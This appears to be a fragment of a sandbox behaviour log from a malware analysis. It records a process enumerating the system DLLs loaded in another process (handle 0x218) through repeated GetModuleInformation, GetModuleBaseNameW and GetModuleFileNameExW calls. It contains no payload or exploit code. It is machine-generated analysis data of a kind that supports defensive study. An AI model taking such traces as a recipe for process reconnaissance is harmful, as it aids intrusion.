GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb410000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="gpsvc.dll") returned 0x9 [0044.470] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb410000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")) returned 0x1d [0044.471] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x25b8ff8, cb=0x18 | out: lpmodinfo=0x25b8ff8*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0044.472] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0044.473] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0044.475] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x25bb1b8, cb=0x18 | out: lpmodinfo=0x25bb1b8*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0044.476] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0044.477] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0044.478] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x25bd378, cb=0x18 | out: lpmodinfo=0x25bd378*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0044.479] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0044.480] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0044.484] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x25bf538, cb=0x18 | out: lpmodinfo=0x25bf538*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0044.486] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0044.487] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0044.488] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x25c16f8, cb=0x18 | out: lpmodinfo=0x25c16f8*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0044.490] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0044.491] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0044.492] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1d0000, lpmodinfo=0x25c38a8, cb=0x18 | out: lpmodinfo=0x25c38a8*(lpBaseOfDll=0x7fefd1d0000, SizeOfImage=0xa000, EntryPoint=0x7fefd1d3b40)) returned 1 [0044.494] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SYSNTFY.dll") returned 0xb [0044.495] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\SYSNTFY.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")) returned 0x1f [0044.496] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3f0000, lpmodinfo=0x25c5a68, cb=0x18 | out: lpmodinfo=0x25c5a68*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0044.498] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0044.499] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0044.501] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x25c7c28, cb=0x18 | out: lpmodinfo=0x25c7c28*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0044.502] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0044.504] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0044.505] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb370000, lpmodinfo=0x25c9df8, cb=0x18 | out: lpmodinfo=0x25c9df8*(lpBaseOfDll=0x7fefb370000, SizeOfImage=0x37000, EntryPoint=0x7fefb378424)) returned 1 [0044.506] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb370000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="profsvc.dll") returned 0xb [0044.508] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb370000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")) returned 0x1f [0044.510] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x25cbfd0, cb=0x18 | out: lpmodinfo=0x25cbfd0*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0044.511] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0044.513] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0044.514] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x25ce1a0, cb=0x18 | out: lpmodinfo=0x25ce1a0*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0044.516] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0044.517] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0044.519] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x25d0360, cb=0x18 | out: lpmodinfo=0x25d0360*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0044.521] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0044.522] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0044.524] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x25d2520, cb=0x18 | out: lpmodinfo=0x25d2520*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0044.526] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0044.528] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0044.529] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb350000, lpmodinfo=0x25d46e0, cb=0x18 | out: lpmodinfo=0x25d46e0*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0044.531] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0044.533] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0044.534] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x25d6890, cb=0x18 | out: lpmodinfo=0x25d6890*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0044.536] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0044.538] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0044.540] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x25d8a50, cb=0x18 | out: lpmodinfo=0x25d8a50*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0044.542] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0044.543] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0044.545] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x25dae28, cb=0x18 | out: lpmodinfo=0x25dae28*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0044.547] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0044.549] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0044.551] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb340000, lpmodinfo=0x25dcfe8, cb=0x18 | out: lpmodinfo=0x25dcfe8*(lpBaseOfDll=0x7fefb340000, SizeOfImage=0x10000, EntryPoint=0x7fefb34835c)) returned 1 [0044.553] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb340000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="themeservice.dll") returned 0x10 [0044.555] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb340000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")) returned 0x24 [0044.558] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x25df1c8, cb=0x18 | out: lpmodinfo=0x25df1c8*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0044.559] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0044.562] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0044.563] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb330000, lpmodinfo=0x25e1388, cb=0x18 | out: lpmodinfo=0x25e1388*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0044.565] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb330000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0044.568] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb330000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0044.570] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb320000, lpmodinfo=0x25e3548, cb=0x18 | out: lpmodinfo=0x25e3548*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0044.572] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb320000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0044.574] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb320000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0044.576] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc0d0000, lpmodinfo=0x25e56f8, cb=0x18 | out: lpmodinfo=0x25e56f8*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0044.578] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0044.580] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0044.583] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x25e78b8, cb=0x18 | out: lpmodinfo=0x25e78b8*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0044.585] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0044.587] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0044.589] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb240000, lpmodinfo=0x25e9a78, cb=0x18 | out: lpmodinfo=0x25e9a78*(lpBaseOfDll=0x7fefb240000, SizeOfImage=0x14000, EntryPoint=0x7fefb243e64)) returned 1 [0044.591] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb240000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sens.dll") returned 0x8 [0044.594] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb240000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")) returned 0x1c [0044.596] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x25ebc38, cb=0x18 | out: lpmodinfo=0x25ebc38*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0044.598] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0044.600] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0044.603] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x25eddf8, cb=0x18 | out: lpmodinfo=0x25eddf8*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0044.605] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0044.607] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0044.610] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb2a0000, lpmodinfo=0x25effe0, cb=0x18 | out: lpmodinfo=0x25effe0*(lpBaseOfDll=0x7fefb2a0000, SizeOfImage=0x67000, EntryPoint=0x7fefb2b6060)) returned 1 [0044.612] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb2a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ES.DLL") returned 0x6 [0044.614] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb2a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ES.DLL" (normalized: "c:\\windows\\system32\\es.dll")) returned 0x1a [0044.617] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd680000, lpmodinfo=0x25f2190, cb=0x18 | out: lpmodinfo=0x25f2190*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0044.619] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd680000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SXS.DLL") returned 0x7 [0044.622] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd680000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SXS.DLL" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0044.625] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc260000, lpmodinfo=0x25f4340, cb=0x18 | out: lpmodinfo=0x25f4340*(lpBaseOfDll=0x7fefc260000, SizeOfImage=0x1d000, EntryPoint=0x7fefc261ef4)) returned 1 [0044.627] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc260000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SAMLIB.dll") returned 0xa [0044.630] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc260000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMLIB.dll" (normalized: "c:\\windows\\system32\\samlib.dll")) returned 0x1e [0044.632] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefaba0000, lpmodinfo=0x25f6500, cb=0x18 | out: lpmodinfo=0x25f6500*(lpBaseOfDll=0x7fefaba0000, SizeOfImage=0x5e000, EntryPoint=0x7fefaba9024)) returned 1 [0044.635] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefaba0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="shsvcs.dll") returned 0xa [0044.637] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefaba0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")) returned 0x1e [0044.640] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x25f86c0, cb=0x18 | out: lpmodinfo=0x25f86c0*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0044.642] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0044.645] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0044.648] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x25fa890, cb=0x18 | out: lpmodinfo=0x25fa890*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0044.651] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0044.653] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0044.656] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x25fca60, cb=0x18 | out: lpmodinfo=0x25fca60*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0044.659] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0044.662] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0044.664] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x25fec20, cb=0x18 | out: lpmodinfo=0x25fec20*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0044.667] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0044.670] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0044.673] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x2600df0, cb=0x18 | out: lpmodinfo=0x2600df0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0044.675] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0044.678] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0044.682] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x2602fb0, cb=0x18 | out: lpmodinfo=0x2602fb0*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0044.685] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0044.688] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0044.690] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefab40000, lpmodinfo=0x2605170, cb=0x18 | out: lpmodinfo=0x2605170*(lpBaseOfDll=0x7fefab40000, SizeOfImage=0x56000, EntryPoint=0x7fefab41040)) returned 1 [0044.693] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefab40000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="FVEAPI.dll") returned 0xa [0044.696] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefab40000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FVEAPI.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")) returned 0x1e [0044.733] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefab30000, lpmodinfo=0x2607330, cb=0x18 | out: lpmodinfo=0x2607330*(lpBaseOfDll=0x7fefab30000, SizeOfImage=0x9000, EntryPoint=0x7fefab31020)) returned 1 [0044.735] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefab30000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="tbs.dll") returned 0x7 [0044.738] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefab30000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")) returned 0x1b [0044.741] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefab20000, lpmodinfo=0x26094e0, cb=0x18 | out: lpmodinfo=0x26094e0*(lpBaseOfDll=0x7fefab20000, SizeOfImage=0x9000, EntryPoint=0x7fefab23668)) returned 1 [0044.744] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefab20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="FVECERTS.dll") returned 0xc [0044.747] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefab20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FVECERTS.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")) returned 0x20 [0044.750] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9d0000, lpmodinfo=0x260b6b0, cb=0x18 | out: lpmodinfo=0x260b6b0*(lpBaseOfDll=0x7fefb9d0000, SizeOfImage=0x16000, EntryPoint=0x7fefb9d11a0)) returned 1 [0044.753] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NETAPI32.dll") returned 0xc [0044.756] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NETAPI32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0044.759] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9c0000, lpmodinfo=0x260d880, cb=0x18 | out: lpmodinfo=0x260d880*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0044.762] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0044.765] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0044.768] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd570000, lpmodinfo=0x260fa50, cb=0x18 | out: lpmodinfo=0x260fa50*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0044.771] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd570000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0044.774] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd570000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e 